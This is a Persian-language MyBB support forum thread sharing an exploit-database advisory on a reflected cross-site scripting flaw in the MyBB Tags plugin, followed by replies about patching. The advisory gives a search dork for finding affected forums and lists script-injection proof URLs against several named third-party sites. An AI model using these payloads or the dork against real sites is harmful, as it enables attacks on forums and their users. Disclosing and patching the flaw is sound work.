مهمان عزیز خوش آمدید. ورود ثبت نام



امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
کلمات کلیدی
mybb tags plugin cross site scripting vulnerability

Mybb Tags Plugin Cross-Site Scripting Vulnerability
با سلام و درود.
روز 13 رو با یک اکسپلویتی که اکثر سایت هایی که از mybb استفاده میکنند,حتی سایت های پشتیبانی,این باگ رو دارند.این فکر کنم قبلا ثبت شده بود.اما این روی تمامی ورژن ها و سایت های بزرگتر هم دیده شد و به ثبت رسید.
امیدوارم هرچه زودتر این باگ پتچ بشه.
کد:
#################################

#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#

#####################################

#####################################

# Iranian Exploit DataBase

# Mybb Tags Plugin Cross-Site Scripting Vulnerability

# Version Tag Plugin : 1.*

# Vulnerable: 1.6.* and 1.8.*

# Vendor site : https://mods.mybb.com/view/tag-system

# Dork : "MyBB, © 2002-2016" + inurl:tags.php?tag=

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

#####################################

Bug :

http://www.site.com/mybb/tags.php?tag=[Xss]

Dem0 :

http://my-bb.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forum.woc.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.lawwiki.ir/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.andysheh.com/talar/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://stertixforum.altervista.org/tags.php?tag=mybb"><script>alert(/IeDb.Ir/)</script>
http://bmw-diag.pl/tags.php?tag=ZUSB"><script>alert(/IeDb.Ir/)</script>
http://www.englishlearner.info/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forumszklarskaporeba.pl/tags.php?tag=T%C5%82usty%3Cinput%20onfocus=alert%281%29%20autofocus%3E

#####################################

# Archive Exploit = http://iedb.ir/exploits-4982.html

#####################################
داخل دموها نمونه هایی از این باگ هستش که برخی از سایت های پشتیبانی هم شامل میشه.البته چندتا دیگم نذاشتم.ولی فقط برای اینکه یکم به فکر باشند و اینکه چون اسم خودشون رو مرجع مای بی بی گذاشتن,فکر نککد که امنیت صددرصد هستش و هیچ مشکلی نیست.
امیدوارم به اندازه ای که خیلی ها به فکر بزرگ بودن و اسم خودشون باشن,به فکر سایتشون باشن.
اینو خیلی وقته ثبت داشتم.خیلی دوست داشتم قبل اینکه ثبت کنم یکم به حرفم گوش بدن.اما دیدم چندتا سایت ایرانی اصلا گوش نکردند.واسه همین ثبتش کردم تا یکم به خودشون بیان.
چندتا دیگه هم ثبت خواهم کرد و خواهم گذاشت.خدارو شکر اینجا این باگ رو نداشت.اما چندتا دیگه هست که اول گزارش میدم و بعد ثبت میکنم.

لینک : http://iedb.ir/exploits-4982.html

http://kkli.ir/n37pu

موفق باشید.
  Heart


پاسخ
راستی,دو ضعف امنیتی هم داره که یک جورایی مربوط به این هست.
انشالله با آقا علیرضا این مشکل رو برطرف خواهیم کرد و بعد از اون این اکسپلویت رو کامل تر خواهیم کرد.چون این دوتای دیگه با اینکه درجه اهمیت پایینه.اما دوتا مشکل امنیتی هستش که اگه کامل پتچ شه خیلی بهتره تا اینکه اصلا گزارش داده نشه.
موفق باشید.


پاسخ
نسخه‌ی تگ ارائه شده برای ۱.۶ و ۱.۸ توی این سایت این مشکل رو نداره...


دعای خیر برای اعضای گروه مای بی‌بی فارسی را فراموش نکنید!تصویر: http://www.cdn.my-bb.ir/images/smilies-v6/lightbulb.gif

HeartHeart خیلی التماس دعا دارم... دعام کنید لطفا HeartHeart

اگر از گروه مای بی‌بی فارسی راضی هستید، پس لطفا آنرا حمایت کنید: حمایت می‌کنم
پاسخ
سلام
آره علیرضا جان.اینجا هیچ مشکلی نداره.فقط اینجا هیچ مشکلی رو نداره.سایت های دیگه خیلی بدتر از اینو دارن.
مطمون باش اگه میداشت زودتر قبل اینکه پابلیک شه میگفتم.


پاسخ
سلام و درود.
علیرضا جان,چرا فایل خد به خود ویرایش شده ؟؟؟؟؟
اولین دمو mybbskin هستش.اصلا نام my-bb.ir نبوده.چون این باگ رو نداشته.
اما چرا داخل اینجا ویرایش رو میزنم نوشته mybbskin اما وقتی سایت رو باز میکنم نام my-bb خورده؟دلیل چیه؟
این اکسپلویت اصلی :
http://iedb.ir/exploits-4982.html
هیچ نامی از این سایت نیست.اما توی پست نام اینجا رو میزنه؟اما روی ویرایش میزنم باز نشون نمیده.
کلمات رو محدود کردی؟چون باگ روی اینجا جواب نمیده.اما روی سایت mybbskin جواب میده و داده.
رسیدگی کنید علیرضا جان.


پاسخ


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  انتشار نسخه ی MyBB 2 AzNet 9 434 ۲۹ تير ۱۳۹۵، ۱۲:۴۵ ب.ظ
آخرین ارسال: mx13
  درخواست تست پلاگین امنیتی MyBB Encrypt Cookies Tofighi 4 555 ۲۰ دى ۱۳۹۳، ۰۶:۴۸ ب.ظ
آخرین ارسال: Tofighi
  MyBB.cc TaK DoKhTaR 7 604 ۱۲ مرداد ۱۳۹۲، ۱۰:۴۸ ب.ظ
آخرین ارسال: Tofighi
  نسخه ی 2 Mybb نیز در راه است.... _Arman 10 1,074 ۰۷ فروردین ۱۳۹۲، ۱۱:۲۰ ب.ظ
آخرین ارسال: Tofighi

پرش به انجمن:


کاربران در حال بازدید این موضوع:

1 مهمان


درباره‌ی ما

گروه پشتیبانی فارسی مای بی بی My-BB.Ir در واپسین روزهای پاییز 1391 کار خود را در زمینه مای بی بی آغاز کرد. این گروه با توکل بر خدای منان و دانش فنی خود در تلاش است فعالیتی هرچند ناچیز در زمینه ارتقا و پشتیبانی مای بی بی انجام دهد.
تمامی حقوق برای وب‌سایت پشتیبانی فارسی مای بی‌بی (My-BB.Ir) محفوظ می‌باشد و هرگونه کپی‌برداری از آن شرعا حرام و قانونا غیرمجاز می‌باشد.
قدرت گرفته از مای بی‌بی - فارسی‌ساز: My-BB.Ir و IORA.Ir